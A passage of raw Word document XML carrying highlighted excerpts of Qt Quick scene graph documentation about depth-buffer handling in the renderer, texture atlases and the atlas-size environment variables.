          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or implement a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bumpmapped torus</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2060" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and a custom material. While doing so, one needs to take into account that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default renderer already makes use of the depth buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The renderer modifies the vertex shader returned from</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B" w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2061" w:anchor="vertexShader" w:history="1">
        <w:r w:rsidRPr="00CA563B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGMaterialShader::vertexShader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() and compresses the z values of the vertex after the model-view and projection matrices has been applied and then adds a small translation on the z to position it the correct z position</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The compression assumes that the z values are in the range of 0 to 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1696" w:name="texture-atlas"/>
      <w:bookmarkStart w:id="1697" w:name="_Toc483000898"/>
      <w:bookmarkStart w:id="1698" w:name="_Toc483003889"/>
      <w:bookmarkStart w:id="1699" w:name="_Toc483604242"/>
      <w:bookmarkStart w:id="1700" w:name="_Toc483605462"/>
      <w:bookmarkEnd w:id="1696"/>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Texture Atlas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1697"/>
      <w:bookmarkEnd w:id="1698"/>
      <w:bookmarkEnd w:id="1699"/>
      <w:bookmarkEnd w:id="1700"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>active texture is a unique OpenGL state</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>means that multiple primitives using different OpenGL textures cannot be batched</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The Qt Quick scene graph for this reason allows multiple</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2062" w:history="1">
        <w:r w:rsidRPr="00CA563B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGTexture</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instances to be allocated as smaller sub-regions of a larger texture; a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>texture atlas</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007959FF"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>biggest benefit</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of texture atlases is that </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multiple</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B" w:rsidRPr="007959FF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2063" w:history="1">
        <w:r w:rsidRPr="007959FF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGTexture</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA563B" w:rsidRPr="007959FF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instances now refer to the same OpenGL texture instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This makes it </w:t>
      </w:r>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible to batch textured draw calls as wel</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>l, such as Image items,</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2064" w:anchor="borderimage" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BorderImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items,</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2065" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items and also C++ types such as QSGSimpleTextureNode and custom QSGGeometryNodes using textures.</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CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Large textures</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not go into the texture atlas.</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Atlas based textures are created by passing</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2066" w:anchor="CreateTextureOption-enum" w:history="1">
        <w:r w:rsidRPr="00CA563B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::TextureCanUseAtlas</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to the</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2067" w:anchor="createTextureFromImage" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::createTextureFromImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>().</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CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlas based textures do not have texture coordinates ranging from 0 to 1. </w:t>
      </w:r>
      <w:r w:rsidR="00CA563B" w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu.</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B" w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2068" w:anchor="normalizedTextureSubRect" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGTexture::normalizedTextureSubRect</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the atlas </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>texture coordinates</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scene graph uses heuristics to figure out how large the atlas should be</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and what the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>size threshold</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for being entered into the atlas is. If different values are needed, it is possible to override them using the environment variables</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_ATLAS_WIDTH</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[width]</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA563B">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_ATLAS_HEIGHT</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[height]</w:t>
      </w:r>
      <w:r w:rsidR="00CA563B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
